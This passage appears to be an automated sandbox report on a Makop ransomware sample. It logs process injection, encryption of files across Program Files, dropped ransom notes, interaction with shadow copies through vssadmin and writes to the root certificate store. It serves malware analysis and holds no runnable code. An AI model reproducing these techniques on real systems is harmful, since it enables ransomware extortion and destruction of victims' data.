PID 2604 set thread context of 2488 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2720 set thread context of 1628 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2980 set thread context of 2120 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 236 set thread context of 2672 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1476 set thread context of 1616 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 876 set thread context of 1620 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2256 set thread context of 2792 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 888 set thread context of 2164 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1136 set thread context of 1688 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2088 set thread context of 2364 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 912 set thread context of 1696 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2576 set thread context of 2744 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 280 set thread context of 388 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 588 set thread context of 1592 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 536 set thread context of 2212 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2508 set thread context of 2564 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1676 set thread context of 1768 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 224 set thread context of 2068 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 948 set thread context of 1152 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 216 set thread context of 2552 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1644 set thread context of 900 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1352 set thread context of 396 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1812 set thread context of 2284 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1280 set thread context of 756 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2876 set thread context of 2640 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 808 set thread context of 2880 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2296 set thread context of 2132 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 1548 set thread context of 2412 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe
PID 2676 set thread context of 1964 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0286034.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sao_Paulo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\settings.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msaddsr.dll.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03236_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\TipBand.dll.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\readme-warning.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01462_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_cloudy.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105294.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02845G.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Notebook Templates\readme-warning.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\corner.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\THMBNAIL.PNG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15022_.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTS.ICO C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALSO11.POC C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\ACT3R.SAM C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\readme-warning.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLENDS\BLENDS.INF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199475.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0293234.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_right.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\settings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\sonicsptransform.ax C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Davis C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer.[76AC78C0].[[email protected]].makop C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL020.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sitka C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENVHM.POC C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_COL.HXC C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0232795.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00798_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0300912.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSO.ACL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\VelvetRose.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_pressed.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Hermosillo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Beirut C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\drag.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe N/A
